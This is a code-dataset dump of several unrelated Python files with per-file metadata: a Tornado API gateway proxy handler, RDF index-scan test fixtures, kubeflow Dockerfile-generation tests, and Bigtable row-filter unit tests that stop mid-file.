bde9654bd5cb8a5a2458147651136686cf2b0f00
|
[
"MIT"
] | 1
|
2020-01-06T19:45:55.000Z
|
2020-01-06T19:45:55.000Z
|
{{ cookiecutter.repo_name }}/src/{{ cookiecutter.repo_name }}/models/types/__init__.py
|
NickBeeuwsaert/pyramid.cookiecutter
|
bde9654bd5cb8a5a2458147651136686cf2b0f00
|
[
"MIT"
] | null | null | null |
from .password import PasswordType
| 34
| 34
| 0.882353
| 4
| 34
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 34
| 1
| 34
| 34
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
ed24188abcd1fa1cc76a42b5d147be5e6a82782c
| 5,588
|
py
|
Python
|
gateway-python/app/web/rest/gateway_api.py
|
suomitek/cubeai
|
cc4c0f5f445a552d239910da63944307c1f06e37
|
[
"Apache-2.0"
] | null | null | null |
gateway-python/app/web/rest/gateway_api.py
|
suomitek/cubeai
|
cc4c0f5f445a552d239910da63944307c1f06e37
|
[
"Apache-2.0"
] | null | null | null |
gateway-python/app/web/rest/gateway_api.py
|
suomitek/cubeai
|
cc4c0f5f445a552d239910da63944307c1f06e37
|
[
"Apache-2.0"
] | null | null | null |
import json
import tornado.web
from tornado.httpclient import AsyncHTTPClient
from app.service.gateway_service import gen_next_request, check_allow_forward
class GatewayApi(tornado.web.RequestHandler):
    """Async reverse-proxy handler.

    Every HTTP verb runs the same pipeline: access check, request rewriting
    via ``gen_next_request``, refreshing the token cookies, and an upstream
    fetch whose status/headers/body are relayed back. Per-path CORS headers
    are added for the ``/ability/*`` endpoints.
    """

    async def _forward(self):
        """Run the shared proxy pipeline and return the upstream response.

        Returns None when the response has already been written here:
        either a 403 rejection or the 500 maintenance notice.
        """
        if not check_allow_forward(self.request):
            self.send_error(403)
            return None
        next_request, new_access_token, new_refresh_token = await gen_next_request(self.request)
        if next_request is None:
            self.set_status(500)
            self.write('服务维护中...')  # message text: "service under maintenance"
            return None
        if new_access_token is not None and new_refresh_token is not None:
            self.set_cookie('access_token', new_access_token)
            self.set_cookie('session_token', new_refresh_token)
        http = AsyncHTTPClient()
        try:
            res = await http.fetch(next_request)
        except Exception as e:
            # Tornado raises HTTPError for non-2xx upstream replies; relay
            # that response as-is. NOTE(review): a network-level failure has
            # e.response == None, which would make the next line raise —
            # confirm this is the intended behavior.
            res = e.response
        self.set_status(res.code)
        return res

    def _relay_headers_if_not_json(self, res):
        """If the upstream body is not UTF-8 JSON (e.g. a file download),
        mirror the upstream headers wholesale.

        Returns True when the body parsed as JSON, False otherwise.
        """
        try:
            json.loads(str(res.body, encoding='utf-8'))
            return True
        except Exception:  # narrowed from a bare except
            self._headers = res.headers
            return False

    async def get(self, *args, **kwargs):
        """Proxy GET; relays the X-Total-Count pagination header for JSON
        responses and enables CORS for /ability/web."""
        res = await self._forward()
        if res is None:
            return
        if self._relay_headers_if_not_json(res):
            count = res.headers.get('X-Total-Count')
            if count is not None:
                self.set_header('X-Total-Count', count)
        if self.request.path.startswith('/ability/web'):
            self.set_header("Access-Control-Allow-Origin", "*")  # allow cross-origin access
        self.write(res.body)

    async def post(self, *args, **kwargs):
        """Proxy POST; adds CORS headers for the model/stream and file APIs."""
        res = await self._forward()
        if res is None:
            return
        self._relay_headers_if_not_json(res)
        path = self.request.path
        # '/ability/sream' is kept verbatim — it matches the deployed route.
        if path.startswith(('/ability/model', '/ability/sream')):
            self.set_header("Access-Control-Allow-Origin", "*")  # allow cross-origin access
        elif path.startswith('/ability/file'):
            self.set_header('Access-Control-Allow-Credentials', 'true')
            self.set_header('Access-Control-Allow-Origin', self.request.headers.get('Origin'))
        self.write(res.body)

    async def put(self, *args, **kwargs):
        """Proxy PUT with no extra header handling."""
        res = await self._forward()
        if res is None:
            return
        self._relay_headers_if_not_json(res)
        self.write(res.body)

    async def delete(self, *args, **kwargs):
        """Proxy DELETE with no extra header handling."""
        res = await self._forward()
        if res is None:
            return
        self._relay_headers_if_not_json(res)
        self.write(res.body)

    async def options(self, *args, **kwargs):
        """Answer CORS preflight for the /ability endpoints; 403 otherwise."""
        path = self.request.path
        if path.startswith(('/ability/model', '/ability/sream', '/ability/web')):
            self.set_status(204)
            self.set_header("Access-Control-Allow-Origin", "*")
            self.set_header("Access-Control-Allow-Headers", "content-type")
            self.set_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
            self.finish()
            return
        elif path.startswith('/ability/file'):
            self.set_status(204)
            self.set_header('Access-Control-Allow-Credentials', 'true')
            self.set_header('Access-Control-Allow-Origin', self.request.headers.get('Origin'))
            self.set_header("Access-Control-Allow-Headers", "content-type")
            self.set_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
            self.finish()
            return
        else:
            self.send_error(403)
| 35.592357
| 108
| 0.607373
| 684
| 5,588
| 4.774854
| 0.131579
| 0.064299
| 0.051439
| 0.063993
| 0.909675
| 0.904776
| 0.890692
| 0.890692
| 0.852725
| 0.82823
| 0
| 0.009271
| 0.285791
| 5,588
| 156
| 109
| 35.820513
| 0.80907
| 0.002326
| 0
| 0.850394
| 0
| 0
| 0.12168
| 0.055815
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.031496
| 0
| 0.11811
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ed5667cfd8b5adbd30a4d7d9eb786378cbc21dfb
| 4,939
|
py
|
Python
|
tests/database/fixtures.py
|
JulienDavat/sage-engine
|
87fb7075a07395a527da660d5efc056b0f49758c
|
[
"MIT"
] | 25
|
2018-09-07T14:43:51.000Z
|
2021-10-31T22:41:48.000Z
|
tests/database/fixtures.py
|
JulienDavat/sage-engine
|
87fb7075a07395a527da660d5efc056b0f49758c
|
[
"MIT"
] | 4
|
2018-10-28T15:32:08.000Z
|
2022-01-26T12:47:36.000Z
|
tests/database/fixtures.py
|
JulienDavat/sage-engine
|
87fb7075a07395a527da660d5efc056b0f49758c
|
[
"MIT"
] | 16
|
2018-12-04T17:50:12.000Z
|
2022-03-26T22:55:47.000Z
|
# fixtures.py
# Author: Thomas MINIER - MIT License 2017-2019
def index_scan_fixtures():
    """Get fixtures data for testing Index scans.

    Each fixture is a tuple ``(subject, predicate, object, expected_triples)``
    where a ``None`` term stands for a variable in the triple pattern.
    """
    wsdbm = 'http://db.uwaterloo.ca/~galuc/wsdbm/'
    parent_country = 'http://www.geonames.org/ontology#parentCountry'
    rev = 'http://purl.org/stuff/rev#'
    includes = 'http://purl.org/goodrelations/includes'
    city102 = wsdbm + 'City102'
    country17 = wsdbm + 'Country17'
    review = wsdbm + 'Review19570'
    product = wsdbm + 'Product10041'
    city_triple = (city102, parent_country, country17)
    return [
        # spo
        (city102, parent_country, country17, [city_triple]),
        # sp?
        (city102, parent_country, None, [city_triple]),
        # s?o
        (city102, None, country17, [city_triple]),
        # ?po
        (None, parent_country, country17, [
            (wsdbm + 'City' + num, parent_country, country17)
            for num in ('102', '120', '123', '206', '209', '217')
        ]),
        # s??
        (review, None, None, [
            (review, rev + 'rating', '"8"'),
            (review, rev + 'reviewer', wsdbm + 'User84864'),
            (review, rev + 'text', '"depressant Galveston\'s blindfold\'s Janna Occidentals untying motive\'s reestablished insurer\'s weekday\'s myth secularization site"'),
            (review, rev + 'title', '"Annapurna\'s commence"')
        ]),
        # ??o
        (None, None, product, [
            (wsdbm + 'Offer' + oid, includes, product)
            for oid in ('24200', '35124', '66663')
        ] + [
            (wsdbm + 'Purchase' + pid, wsdbm + 'purchaseFor', product)
            for pid in ('13421', '63338')
        ] + [
            (wsdbm + 'User' + uid, wsdbm + 'likes', product)
            for uid in ('14463', '27316', '47637', '66340')
        ])
    ]
| 62.518987
| 241
| 0.594452
| 553
| 4,939
| 5.305606
| 0.146474
| 0.112474
| 0.281186
| 0.318678
| 0.8606
| 0.8606
| 0.851397
| 0.824131
| 0.818678
| 0.818678
| 0
| 0.049566
| 0.207532
| 4,939
| 78
| 242
| 63.320513
| 0.700051
| 0.025106
| 0
| 0.358209
| 0
| 0.014925
| 0.700541
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014925
| true
| 0
| 0
| 0
| 0.029851
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
ed64d5e02cca28e53ee8bf7a955f0a14335fced4
| 1,630
|
py
|
Python
|
tests/unit/builders/test_dockerfile.py
|
QxiaoQ/fairing
|
3fb8dbc5970008a60eb4832550053aa1f2f215dd
|
[
"Apache-2.0"
] | 1
|
2019-10-18T02:25:32.000Z
|
2019-10-18T02:25:32.000Z
|
tests/unit/builders/test_dockerfile.py
|
QxiaoQ/fairing
|
3fb8dbc5970008a60eb4832550053aa1f2f215dd
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/builders/test_dockerfile.py
|
QxiaoQ/fairing
|
3fb8dbc5970008a60eb4832550053aa1f2f215dd
|
[
"Apache-2.0"
] | 2
|
2020-05-11T07:48:28.000Z
|
2021-05-28T10:32:21.000Z
|
import tempfile
from kubeflow.fairing.builders import dockerfile
def test_writedockerfile_with_docker_cmd():
    """write_dockerfile with a docker_command must append a CMD line."""
    # NOTE(review): the fd returned by mkstemp is discarded and leaks —
    # closing it would need `os.close`; left as-is to keep the diff minimal.
    _, tmp_file = tempfile.mkstemp()
    dockerfile.write_dockerfile(
        destination=tmp_file,
        docker_command=["python", "main.py"],
        path_prefix="/pre",
        base_image="foo_bar")
    # Use a context manager so the file handle is not leaked.
    with open(tmp_file, 'r') as f:
        actual = f.read()
    expected = """FROM foo_bar
WORKDIR /pre
ENV FAIRING_RUNTIME 1
RUN if [ -e requirements.txt ];then pip install --no-cache -r requirements.txt; fi
COPY /pre /pre
CMD python main.py"""
    assert actual == expected
def test_writedockerfile_without_docker_cmd():
    """write_dockerfile with docker_command=None must omit the CMD line."""
    _, tmp_file = tempfile.mkstemp()
    dockerfile.write_dockerfile(
        destination=tmp_file,
        docker_command=None,
        path_prefix="/pre",
        base_image="foo_bar")
    # Use a context manager so the file handle is not leaked.
    with open(tmp_file, 'r') as f:
        actual = f.read()
    expected = """FROM foo_bar
WORKDIR /pre
ENV FAIRING_RUNTIME 1
RUN if [ -e requirements.txt ];then pip install --no-cache -r requirements.txt; fi
COPY /pre /pre"""
    assert actual == expected
def test_writedockerfile_with_early_install_reqs():
    """install_reqs_before_copy=True must install requirements before COPY."""
    _, tmp_file = tempfile.mkstemp()
    dockerfile.write_dockerfile(
        destination=tmp_file,
        docker_command=["python", "main.py"],
        path_prefix="/pre",
        base_image="foo_bar",
        install_reqs_before_copy=True)
    # Use a context manager so the file handle is not leaked.
    with open(tmp_file, 'r') as f:
        actual = f.read()
    expected = """FROM foo_bar
WORKDIR /pre
ENV FAIRING_RUNTIME 1
COPY /pre/requirements.txt /pre
RUN if [ -e requirements.txt ];then pip install --no-cache -r requirements.txt; fi
COPY /pre /pre
CMD python main.py"""
    assert actual == expected
| 29.107143
| 82
| 0.68773
| 217
| 1,630
| 4.940092
| 0.262673
| 0.058769
| 0.044776
| 0.061567
| 0.847015
| 0.847015
| 0.787313
| 0.787313
| 0.787313
| 0.787313
| 0
| 0.002287
| 0.195092
| 1,630
| 55
| 83
| 29.636364
| 0.814787
| 0
| 0
| 0.791667
| 0
| 0.0625
| 0.347853
| 0.012883
| 0
| 0
| 0
| 0
| 0.0625
| 1
| 0.0625
| false
| 0
| 0.041667
| 0
| 0.104167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c088dd102045f3614aff31c7fe00e3a37c655a2
| 121
|
py
|
Python
|
modules/tests/staff/__init__.py
|
smeissner/eden
|
9c4c78f0808e53c52d3caa4fa68162cddc174547
|
[
"MIT"
] | 1
|
2021-01-21T18:24:25.000Z
|
2021-01-21T18:24:25.000Z
|
modules/tests/staff/__init__.py
|
smeissner/eden
|
9c4c78f0808e53c52d3caa4fa68162cddc174547
|
[
"MIT"
] | null | null | null |
modules/tests/staff/__init__.py
|
smeissner/eden
|
9c4c78f0808e53c52d3caa4fa68162cddc174547
|
[
"MIT"
] | null | null | null |
from staff import *
from search_staff import *
from create_staff_job_role import *
from create_staff_certificate import *
| 30.25
| 38
| 0.842975
| 18
| 121
| 5.333333
| 0.444444
| 0.3125
| 0.3125
| 0.4375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123967
| 121
| 4
| 38
| 30.25
| 0.90566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9c0abe24f47d43b6a7bb6ec76ed5b805df274e1e
| 34,701
|
py
|
Python
|
Backend/python_server/venv/Lib/site-packages/gcloud/bigtable/test_row_filters.py
|
SulbhaAgg/EduSpace-1
|
f948d890aac7869016e75662c0c798f2a42d2ecc
|
[
"MIT"
] | 4
|
2020-04-25T16:53:58.000Z
|
2020-04-30T20:43:06.000Z
|
Backend/python_server/venv/Lib/site-packages/gcloud/bigtable/test_row_filters.py
|
SulbhaAgg/EduSpace-1
|
f948d890aac7869016e75662c0c798f2a42d2ecc
|
[
"MIT"
] | 3
|
2020-06-03T08:09:39.000Z
|
2021-04-30T21:17:43.000Z
|
Backend/python_server/venv/Lib/site-packages/gcloud/bigtable/test_row_filters.py
|
SulbhaAgg/EduSpace-1
|
f948d890aac7869016e75662c0c798f2a42d2ecc
|
[
"MIT"
] | 2
|
2021-08-21T04:45:15.000Z
|
2022-01-23T06:50:56.000Z
|
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest2
class Test_BoolFilter(unittest2.TestCase):
    """Unit tests for the private ``_BoolFilter`` base class."""

    def _getTargetClass(self):
        # Deferred import: the module under test is resolved at test time.
        from gcloud.bigtable.row_filters import _BoolFilter
        return _BoolFilter

    def _makeOne(self, *args, **kwargs):
        # Build an instance of the class under test.
        return self._getTargetClass()(*args, **kwargs)

    def test_constructor(self):
        # The flag is stored by identity, not copied.
        flag = object()
        row_filter = self._makeOne(flag)
        self.assertTrue(row_filter.flag is flag)

    def test___eq__type_differ(self):
        flag = object()
        row_filter1 = self._makeOne(flag)
        row_filter2 = object()
        self.assertNotEqual(row_filter1, row_filter2)

    def test___eq__same_value(self):
        flag = object()
        row_filter1 = self._makeOne(flag)
        row_filter2 = self._makeOne(flag)
        self.assertEqual(row_filter1, row_filter2)

    def test___ne__same_value(self):
        # Two filters with the same flag must not compare unequal.
        flag = object()
        row_filter1 = self._makeOne(flag)
        row_filter2 = self._makeOne(flag)
        comparison_val = (row_filter1 != row_filter2)
        self.assertFalse(comparison_val)
class TestSinkFilter(unittest2.TestCase):
    """Unit tests for ``SinkFilter``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import SinkFilter
        return SinkFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_to_pb(self):
        # to_pb() should populate the 'sink' field of the RowFilter pb.
        # _RowFilterPB is a pb-building helper defined later in this module.
        flag = True
        row_filter = self._makeOne(flag)
        pb_val = row_filter.to_pb()
        expected_pb = _RowFilterPB(sink=flag)
        self.assertEqual(pb_val, expected_pb)
class TestPassAllFilter(unittest2.TestCase):
    """Unit tests for ``PassAllFilter``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import PassAllFilter
        return PassAllFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_to_pb(self):
        # to_pb() should populate the 'pass_all_filter' field.
        flag = True
        row_filter = self._makeOne(flag)
        pb_val = row_filter.to_pb()
        expected_pb = _RowFilterPB(pass_all_filter=flag)
        self.assertEqual(pb_val, expected_pb)
class TestBlockAllFilter(unittest2.TestCase):
    """Unit tests for ``BlockAllFilter``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import BlockAllFilter
        return BlockAllFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_to_pb(self):
        # to_pb() should populate the 'block_all_filter' field.
        flag = True
        row_filter = self._makeOne(flag)
        pb_val = row_filter.to_pb()
        expected_pb = _RowFilterPB(block_all_filter=flag)
        self.assertEqual(pb_val, expected_pb)
class Test_RegexFilter(unittest2.TestCase):
    """Unit tests for the private ``_RegexFilter`` base class."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import _RegexFilter
        return _RegexFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_constructor(self):
        # A bytes regex is stored by identity.
        regex = b'abc'
        row_filter = self._makeOne(regex)
        self.assertTrue(row_filter.regex is regex)

    def test_constructor_non_bytes(self):
        # A text (unicode) regex is encoded to bytes by the constructor.
        regex = u'abc'
        row_filter = self._makeOne(regex)
        self.assertEqual(row_filter.regex, b'abc')

    def test___eq__type_differ(self):
        regex = b'def-rgx'
        row_filter1 = self._makeOne(regex)
        row_filter2 = object()
        self.assertNotEqual(row_filter1, row_filter2)

    def test___eq__same_value(self):
        regex = b'trex-regex'
        row_filter1 = self._makeOne(regex)
        row_filter2 = self._makeOne(regex)
        self.assertEqual(row_filter1, row_filter2)

    def test___ne__same_value(self):
        regex = b'abc'
        row_filter1 = self._makeOne(regex)
        row_filter2 = self._makeOne(regex)
        comparison_val = (row_filter1 != row_filter2)
        self.assertFalse(comparison_val)
class TestRowKeyRegexFilter(unittest2.TestCase):
    """Unit tests for ``RowKeyRegexFilter``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import RowKeyRegexFilter
        return RowKeyRegexFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_to_pb(self):
        # to_pb() should populate the 'row_key_regex_filter' field.
        regex = b'row-key-regex'
        row_filter = self._makeOne(regex)
        pb_val = row_filter.to_pb()
        expected_pb = _RowFilterPB(row_key_regex_filter=regex)
        self.assertEqual(pb_val, expected_pb)
class TestRowSampleFilter(unittest2.TestCase):
    """Unit tests for ``RowSampleFilter``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import RowSampleFilter
        return RowSampleFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_constructor(self):
        # The sample probability is stored by identity.
        sample = object()
        row_filter = self._makeOne(sample)
        self.assertTrue(row_filter.sample is sample)

    def test___eq__type_differ(self):
        sample = object()
        row_filter1 = self._makeOne(sample)
        row_filter2 = object()
        self.assertNotEqual(row_filter1, row_filter2)

    def test___eq__same_value(self):
        sample = object()
        row_filter1 = self._makeOne(sample)
        row_filter2 = self._makeOne(sample)
        self.assertEqual(row_filter1, row_filter2)

    def test_to_pb(self):
        # to_pb() should populate the 'row_sample_filter' field.
        sample = 0.25
        row_filter = self._makeOne(sample)
        pb_val = row_filter.to_pb()
        expected_pb = _RowFilterPB(row_sample_filter=sample)
        self.assertEqual(pb_val, expected_pb)
class TestFamilyNameRegexFilter(unittest2.TestCase):
    """Unit tests for ``FamilyNameRegexFilter``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import FamilyNameRegexFilter
        return FamilyNameRegexFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_to_pb(self):
        # Family names are text, so a unicode regex is used here.
        regex = u'family-regex'
        row_filter = self._makeOne(regex)
        pb_val = row_filter.to_pb()
        expected_pb = _RowFilterPB(family_name_regex_filter=regex)
        self.assertEqual(pb_val, expected_pb)
class TestColumnQualifierRegexFilter(unittest2.TestCase):
    """Unit tests for ``ColumnQualifierRegexFilter``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import ColumnQualifierRegexFilter
        return ColumnQualifierRegexFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_to_pb(self):
        # to_pb() should populate the 'column_qualifier_regex_filter' field.
        regex = b'column-regex'
        row_filter = self._makeOne(regex)
        pb_val = row_filter.to_pb()
        expected_pb = _RowFilterPB(
            column_qualifier_regex_filter=regex)
        self.assertEqual(pb_val, expected_pb)
class TestTimestampRange(unittest2.TestCase):
    """Unit tests for ``TimestampRange``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import TimestampRange
        return TimestampRange

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_constructor(self):
        # Both endpoints are stored by identity.
        start = object()
        end = object()
        time_range = self._makeOne(start=start, end=end)
        self.assertTrue(time_range.start is start)
        self.assertTrue(time_range.end is end)

    def test___eq__(self):
        start = object()
        end = object()
        time_range1 = self._makeOne(start=start, end=end)
        time_range2 = self._makeOne(start=start, end=end)
        self.assertEqual(time_range1, time_range2)

    def test___eq__type_differ(self):
        start = object()
        end = object()
        time_range1 = self._makeOne(start=start, end=end)
        time_range2 = object()
        self.assertNotEqual(time_range1, time_range2)

    def test___ne__same_value(self):
        start = object()
        end = object()
        time_range1 = self._makeOne(start=start, end=end)
        time_range2 = self._makeOne(start=start, end=end)
        comparison_val = (time_range1 != time_range2)
        self.assertFalse(comparison_val)

    def _to_pb_helper(self, start_micros=None, end_micros=None):
        """Build a range from microsecond offsets and check its pb form.

        ``None`` for either endpoint leaves the matching pb field unset.
        """
        import datetime
        from gcloud._helpers import _EPOCH
        pb_kwargs = {}
        start = None
        if start_micros is not None:
            start = _EPOCH + datetime.timedelta(microseconds=start_micros)
            pb_kwargs['start_timestamp_micros'] = start_micros
        end = None
        if end_micros is not None:
            end = _EPOCH + datetime.timedelta(microseconds=end_micros)
            pb_kwargs['end_timestamp_micros'] = end_micros
        time_range = self._makeOne(start=start, end=end)
        expected_pb = _TimestampRangePB(**pb_kwargs)
        self.assertEqual(time_range.to_pb(), expected_pb)

    def test_to_pb(self):
        # Makes sure already milliseconds granularity
        start_micros = 30871000
        end_micros = 12939371000
        self._to_pb_helper(start_micros=start_micros,
                           end_micros=end_micros)

    def test_to_pb_start_only(self):
        # Makes sure already milliseconds granularity
        start_micros = 30871000
        self._to_pb_helper(start_micros=start_micros)

    def test_to_pb_end_only(self):
        # Makes sure already milliseconds granularity
        end_micros = 12939371000
        self._to_pb_helper(end_micros=end_micros)
class TestTimestampRangeFilter(unittest2.TestCase):
    """Unit tests for ``TimestampRangeFilter``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import TimestampRangeFilter
        return TimestampRangeFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_constructor(self):
        # The wrapped range is stored by identity.
        range_ = object()
        row_filter = self._makeOne(range_)
        self.assertTrue(row_filter.range_ is range_)

    def test___eq__type_differ(self):
        range_ = object()
        row_filter1 = self._makeOne(range_)
        row_filter2 = object()
        self.assertNotEqual(row_filter1, row_filter2)

    def test___eq__same_value(self):
        range_ = object()
        row_filter1 = self._makeOne(range_)
        row_filter2 = self._makeOne(range_)
        self.assertEqual(row_filter1, row_filter2)

    def test_to_pb(self):
        # An empty TimestampRange maps to an empty timestamp_range_filter pb.
        from gcloud.bigtable.row_filters import TimestampRange
        range_ = TimestampRange()
        row_filter = self._makeOne(range_)
        pb_val = row_filter.to_pb()
        expected_pb = _RowFilterPB(
            timestamp_range_filter=_TimestampRangePB())
        self.assertEqual(pb_val, expected_pb)
class TestColumnRangeFilter(unittest2.TestCase):
    """Unit tests for ``ColumnRangeFilter``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import ColumnRangeFilter
        return ColumnRangeFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_constructor_defaults(self):
        # With only a family id: open-ended range, both ends inclusive.
        column_family_id = object()
        row_filter = self._makeOne(column_family_id)
        self.assertTrue(row_filter.column_family_id is column_family_id)
        self.assertEqual(row_filter.start_column, None)
        self.assertEqual(row_filter.end_column, None)
        self.assertTrue(row_filter.inclusive_start)
        self.assertTrue(row_filter.inclusive_end)

    def test_constructor_explicit(self):
        column_family_id = object()
        start_column = object()
        end_column = object()
        inclusive_start = object()
        inclusive_end = object()
        row_filter = self._makeOne(
            column_family_id,
            start_column=start_column,
            end_column=end_column,
            inclusive_start=inclusive_start,
            inclusive_end=inclusive_end)
        self.assertTrue(row_filter.column_family_id is column_family_id)
        self.assertTrue(row_filter.start_column is start_column)
        self.assertTrue(row_filter.end_column is end_column)
        self.assertTrue(row_filter.inclusive_start is inclusive_start)
        self.assertTrue(row_filter.inclusive_end is inclusive_end)

    def test_constructor_bad_start(self):
        # Passing inclusive_start without a start_column is rejected.
        column_family_id = object()
        self.assertRaises(ValueError, self._makeOne,
                          column_family_id, inclusive_start=True)

    def test_constructor_bad_end(self):
        # Passing inclusive_end without an end_column is rejected.
        column_family_id = object()
        self.assertRaises(ValueError, self._makeOne,
                          column_family_id, inclusive_end=True)

    def test___eq__(self):
        column_family_id = object()
        start_column = object()
        end_column = object()
        inclusive_start = object()
        inclusive_end = object()
        row_filter1 = self._makeOne(column_family_id,
                                    start_column=start_column,
                                    end_column=end_column,
                                    inclusive_start=inclusive_start,
                                    inclusive_end=inclusive_end)
        row_filter2 = self._makeOne(column_family_id,
                                    start_column=start_column,
                                    end_column=end_column,
                                    inclusive_start=inclusive_start,
                                    inclusive_end=inclusive_end)
        self.assertEqual(row_filter1, row_filter2)

    def test___eq__type_differ(self):
        column_family_id = object()
        row_filter1 = self._makeOne(column_family_id)
        row_filter2 = object()
        self.assertNotEqual(row_filter1, row_filter2)

    def test_to_pb(self):
        column_family_id = u'column-family-id'
        row_filter = self._makeOne(column_family_id)
        col_range_pb = _ColumnRangePB(family_name=column_family_id)
        expected_pb = _RowFilterPB(column_range_filter=col_range_pb)
        self.assertEqual(row_filter.to_pb(), expected_pb)

    def test_to_pb_inclusive_start(self):
        # Inclusive start maps to the 'closed' qualifier pb field.
        column_family_id = u'column-family-id'
        column = b'column'
        row_filter = self._makeOne(column_family_id, start_column=column)
        col_range_pb = _ColumnRangePB(
            family_name=column_family_id,
            start_qualifier_closed=column,
        )
        expected_pb = _RowFilterPB(column_range_filter=col_range_pb)
        self.assertEqual(row_filter.to_pb(), expected_pb)

    def test_to_pb_exclusive_start(self):
        # Exclusive start maps to the 'open' qualifier pb field.
        column_family_id = u'column-family-id'
        column = b'column'
        row_filter = self._makeOne(column_family_id, start_column=column,
                                   inclusive_start=False)
        col_range_pb = _ColumnRangePB(
            family_name=column_family_id,
            start_qualifier_open=column,
        )
        expected_pb = _RowFilterPB(column_range_filter=col_range_pb)
        self.assertEqual(row_filter.to_pb(), expected_pb)

    def test_to_pb_inclusive_end(self):
        column_family_id = u'column-family-id'
        column = b'column'
        row_filter = self._makeOne(column_family_id, end_column=column)
        col_range_pb = _ColumnRangePB(
            family_name=column_family_id,
            end_qualifier_closed=column,
        )
        expected_pb = _RowFilterPB(column_range_filter=col_range_pb)
        self.assertEqual(row_filter.to_pb(), expected_pb)

    def test_to_pb_exclusive_end(self):
        column_family_id = u'column-family-id'
        column = b'column'
        row_filter = self._makeOne(column_family_id, end_column=column,
                                   inclusive_end=False)
        col_range_pb = _ColumnRangePB(
            family_name=column_family_id,
            end_qualifier_open=column,
        )
        expected_pb = _RowFilterPB(column_range_filter=col_range_pb)
        self.assertEqual(row_filter.to_pb(), expected_pb)
class TestValueRegexFilter(unittest2.TestCase):
    """Unit tests for ``ValueRegexFilter``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import ValueRegexFilter
        return ValueRegexFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_to_pb(self):
        # to_pb() should populate the 'value_regex_filter' field.
        regex = b'value-regex'
        row_filter = self._makeOne(regex)
        pb_val = row_filter.to_pb()
        expected_pb = _RowFilterPB(value_regex_filter=regex)
        self.assertEqual(pb_val, expected_pb)
